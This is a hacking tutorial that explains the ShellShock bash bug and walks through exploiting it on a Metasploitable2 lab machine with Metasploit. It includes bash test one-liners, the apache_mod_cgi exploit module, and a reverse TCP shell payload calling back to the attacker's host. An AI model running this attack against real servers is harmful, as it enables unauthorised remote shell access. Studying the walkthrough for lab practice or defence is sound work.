Tutorials

ShellShock Vulnerability Exploitation With Metasploit Framework

Previously we’ve well explained the Heartbleed Vulnerability which already created so much havoc and now we’ll show you a live exploitation of ShellShock Vulnerability (CVE-2014-6271) with Metasploit Framework. ShellShock Vulnerability also called Bash Bug Vulnerability which already affects thousands of Linux/Unix operating systems. This vulnerability has originally discovered by Stephane Chazelas.

Essentially, ShellShock works by allowing an attacker to append commands to function definitions in the values of environment variables. This would be classified as a type of code injection attack, and since Bash will process these commands after the function definition, pretty much any arbitrary code can be executed.

The ShellShock problem is an example of an arbitrary code execution (ACE) vulnerability. Typically, ACE vulnerability attacks are executed on programs that are running, and require a highly sophisticated understanding of the internals of code execution, memory layout, and assembly language—in short, this type of attack requires an expert. Attacker will also use an ACE vulnerability to upload or run a program that gives them a simple way of controlling the targeted machine. This is often achieved by running a “shell”. A shell is a command-line where commands can be entered and executed.

You can also run a simple command to check whether your bash is vulnerable or not:

Command: x='() { :;}; echo VULNERABLE’ bash -c :
OR
Command: env x='() { :;}; echo VULNERABLE; exit;’ bash -c ‘echo NOT VULNERABLE’

It runs the command bash -c : with the literal text () { :;}; echo VULNERABLE set as the value of the environment variable x.

  • The : builtin performs no action; it’s used here where a non-empty command is required and bash -c : creates an instance of bash that runs : and exits.
  • Even this is sufficient to allow the vulnerability to be triggered. Even though bash is being invoked to run only one command (and that command is a no-op), it still reads its environment and interprets each variable whose contents start with () { as a function (at least those whose names are valid function names) and runs it so the function will be defined.

For more info, please refer to stackexchange.

If your bash is vulnerable, then your system is vulnerable in as much as it uses bash along attack vectors such as CGI scripts, DHCP clients and restricted SSH accounts. Check whether /bin/sh is bash or some other shell. The vulnerability is in a bash-specific feature and other shells such as dash and ksh are not affected.

You can test the default shell by running the same test as above with sh instead of bash:

Command: x='() { :;}; echo VULNERABLE’ sh -c :

Exploitation with Metasploit Framework –

Here we’ve setup a virtual environment with Metasploitable2 Machine and hosted under Vmware Workstation whose IP Address is 192.168.20.128 (It might be different in your case). Metasploitable2 is one the best virtual machine full of vulnerabilities which actually enhance your hacking skills.

To do this, just create a executable script in /cgi-bin directory (located at /usr/lib/cgi-bin) and add the following code inside into it.

Command: cd /usr/lib/cgi-bin/
Command: sudo nano yeahhub.sh

Code:

#! /bin/bash
echo “Content-type: text/html”
echo “”
echo “Hello yeahhub.com”

Now give 755 permissions to yeahhub.sh file which you just created above in first step by typing the following command:

Command: sudo chmod 755 yeahhub.sh

Now browse the same file by accessing through web browser http://192.168.20.128/cgi-bin/yeahhub.sh

Now load the Metasploit Framework with “msfconsole” command and search all the shellshock related exploits with search command as shown below:

Command: search shellshock

Here is the complete list of exploits which it shows:

  • 1) auxiliary/scanner/http/apache_mod_cgi_bash_env
    (2014-09-24 | normal | Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner)
  • 2) auxiliary/server/dhclient_bash_env
    (2014-09-24 | normal | DHCP Client Bash Environment Variable Code Injection (Shellshock))
  • 3) exploit/linux/http/advantech_switch_bash_env_exec
    (2015-12-01 | excellent | Advantech Switch Bash Environment Variable Code Injection (Shellshock))
  • 4) exploit/linux/http/ipfire_bashbug_exec
    (2014-09-29 | excellent | IPFire Bash Environment Variable Injection (Shellshock))
  • 5) exploit/multi/ftp/pureftpd_bash_env_exec
    (2014-09-24 | excellent | Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock))
  • 6) exploit/multi/http/apache_mod_cgi_bash_env_exec
    (2014-09-24 | excellent | Apache mod_cgi Bash Environment Variable Code Injection (Shellshock))
  • 7) exploit/multi/http/cups_bash_env_exec
    (2014-09-24 | excellent | CUPS Filter Bash Environment Variable Code Injection (Shellshock))
  • 8) exploit/multi/misc/legend_bot_exec
    (2015-04-27 | excellent | Legend Perl IRC Bot Remote Code Execution)
  • 9) exploit/multi/misc/xdh_x_exec
    (2015-12-04 | excellent | Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution)
  • 10) exploit/osx/local/vmware_bash_function_root
    (2014-09-24 | normal | OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock))
  • 11) exploit/unix/dhcp/bash_environment
    (2014-09-24 | excellent | Dhclient Bash Environment Variable Injection (Shellshock))
  • 12) exploit/unix/smtp/qmail_bash_env_exec
    (2014-09-24 | normal | Qmail SMTP Bash Environment Variable Injection (Shellshock))

Load the above red colored exploit by typing use followed by the location of the exploit.

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

Command: use exploit/multi/http/apache_mod_cgi_bash_env_exec

Type “show options” to see the various settings for this module/exploit.

We can leave most of the defaults, but we’ll need to set the RHOST to the IP address of the target(192.168.20.128), and the target URI (/cgi-bin/yeahhub.sh)

Command: set RHOST 192.168.20.128
Command: set TARGETURI /cgi-bin/yeahhub.sh

Next, we need to choose a payload which gives you back TCP connection.

Command: set payload linux/x86/shell/reverse_tcp

You can also type “show payloads” to view different payloads and information regarding each of them (optional).

Furthermore, you need to set your LHOST address to the IP address of your machine (Kali Linux – 192.168.20.129) by typing:

Command: set LHOST 192.168.20.129

And then type “check” command to check whether your target is vulnerable to ShellShock Vulnerability or not.

We can see that the target is indeed vulnerable, so use the exploit command to launch the attack which instantly opens a shell session where you can further run any system level commands like id or whoami to view information about the current user:

Note: This shell will be a limited shell, it means you can only run few system level command for escalate privileges, you need to perform Local Privilege Escalation using a Linux Kernel Exploit.

There are around 7 different variants available for testing the ShellShock Vulnerability.

You can view the source and download it here – shellshock_test.sh on GitHub.

Also Read: ShellShock Vulnerability Exploitation With HTTP Request

Have something to say about this article? Comment below or share it with us on Facebook or Twitter.

Yeahhub.com
Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/

Leave a Reply

Your email address will not be published. Required fields are marked *

thirteen + 13 =